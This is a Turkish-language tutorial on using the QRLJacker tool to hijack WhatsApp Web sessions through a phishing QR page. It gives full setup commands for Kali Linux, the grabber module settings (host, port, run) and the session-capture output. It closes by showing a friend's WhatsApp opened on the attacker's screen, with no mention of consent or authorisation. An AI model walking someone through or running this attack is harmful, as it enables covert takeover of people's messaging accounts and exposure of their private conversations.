Sosyal Mühendislik saldırıları son hızla çalışıyor. Saldırganların çoğu hedefleri kandırmak için sosyal mühendislik yöntemlerini kullanmaktadır. Bugün sizlere Uygulama Web Oturumlarını elde etmede kullanılan QRLJacker’da sosyal mühendislik yöntemini anlatmaya çalışacağım. Aklınızda bulunsun bu program python ile yazılmış.
QRLJacker, Pentesting’in ilk aşamasında yardımcı olabilecek Whatsapp oturumu ele geçirme işleminde kullanılan en yaygın araçtır.
Bu araç nasıl çalışır?
-Tabiki kimlik avı prensibine göre çalışmaktadır. Yani; kullanıcıların kimlik bilgilerini toplamak için sahte giriş sayfalarının oluşturulduğu bir tür sosyal mühendislik saldırısı olarak nitelendirebiliriz.
Arkadaşlar ben test için VMware Workstation da kurulu Kali Linux 2019.4 amd64 kullanmış bulunmaktayım.
Bu arada Geeko sürücüsü; Mozilla tarafından geliştirilen ve uygulamalarda kullanılan Web tarayıcı motoru olarak görev yapmaktadır.
Selenium (bir python modülü) ve Mozilla tarayıcısı arasında bir bağlantı oluşturur.
Evet gelelim adımlarımıza; Kali’de Terminal açıp,
[email protected]:~/ cd Downloads ile Downloads dizinine geçiyoruz, ardından sırasıyla aşagıdaki adımları gerçeleştiriyoruz.
[email protected]:~/Downloads# wget https://github.com/mozilla/geckodriver/releases/download/v0.24.0/geckodriver-v0.24.0-linux64.tar.gz
[email protected]:~/Downloads# tar -xvzf geckodriver-v0.24.0-linux64.tar.gz and change directory to extracted one.
[email protected]:~/Downloads# sudo mv -f geckodriver /usr/local/share/geckodriver
[email protected]:~/Downloads# sudo ln -s /usr/local/share/geckodriver /usr/local/bin/geckodriver
[email protected]:~/Downloads# sudo ln -s /usr/local/share/geckodriver /usr/bin/geckodriver
Eğer ki python3.7 yüklü değilse yüklüyoruz. Tabi ki bu arada firefox tarayıcısını güncellemeyi unutmayın. Bunun için;
[email protected]:~# sudo apt-get update & sudo apt-get install firefox-esr
Ardından; python3.7 ve pip paketini yüklüyoruz.
[email protected]:~# apt-get install python3.7
Sürümlerimizin güncel olduğundan emin olun;
[email protected]:~# sudo apt-get update
[email protected]:~# sudo apt-get -y upgrade
Yüklü olan Python3 sürümünü kontrol edelim,
[email protected]:~# python3 -V
Bende ki sürüm,
[email protected]:~# python3 3.7.3rc1
Python için yazılım paketlerini yönetmek için, pip’i yükleyelim,
[email protected]:~# sudo apt-get install -y python3-pip
Python paketlerini yazarakta yükleyebilirsin,
[email protected]:~# pip3 install package_name
Tabiki programlama ortamımız için sağlam bir kurulum yapmamızı sağlamak için kurulacak birkaç paket ve geliştirme aracıda mevcuttur,
[email protected]:~# sudo apt-get install build-essential libssl-dev libffi-dev python-dev
Python paketlerini yükledikten sonra işleme devam edelim,
[email protected]:~/Downloads# git clone https://github.com/OWASP/QRLJacking
[email protected]:~/Downloads# cd QRLJacking/QRLJacker/
[email protected]:~/QRLJacking/QRLJacker# ls
[email protected]:~/QRLJacking/QRLJacker# python3.7 -m pip install -r requirements.txt
[email protected]:~/QRLJacking/QRLJacker# python3.7 QrlJacker.py
QrlJacker > help
QrlJacker > list
QrlJacker > use grabber/whatsapp
QrlJacker Module(grabber/whatsapp) > options
QrlJacker Module(grabber/whatsapp) > set port 1337
QrlJacker Module(grabber/whatsapp) > set host 172.16.0.55
QrlJacker Module(grabber/whatsapp) > run
QrlJacker Module(grabber/whatsapp) >
[+] Using the default useragent
[+] Running a thread to keep the QR image [whatsapp]
[+] Waiting for sessions on whatsapp
[+] Running a thread to detect Idle once it happens then click the QR reload button [whatsapp]
[+] Initializing webserver… [whatsapp]
Qrljacker sunucusunu başladı, bu kısımdan sonra Sosyal Mühendislik yöntemleri ile IP yi arkadaşınıza bir şekilde ulaşmasını sağlıyoruz 🙂
//172.16.0.55:1337
Arkadaşınız Whatsapp QR kodunu tarattığında web otutumu açılmış olacaktır. Bizde sessions kontrol ediyoruz,
QrlJacker Module(grabber/whatsapp) > sessions
ve
ID Module name Capture on
0 Whatsapp Web-Apr-17-11:00:02-2019
QrlJacker Module(grabber/whatsapp) > sessions -i 0 dediğimizde firefox tarayıcımız açılıyor ve arkadaşınızın Whatsapp ‘ı ekranınızda 🙂 İyi Günler…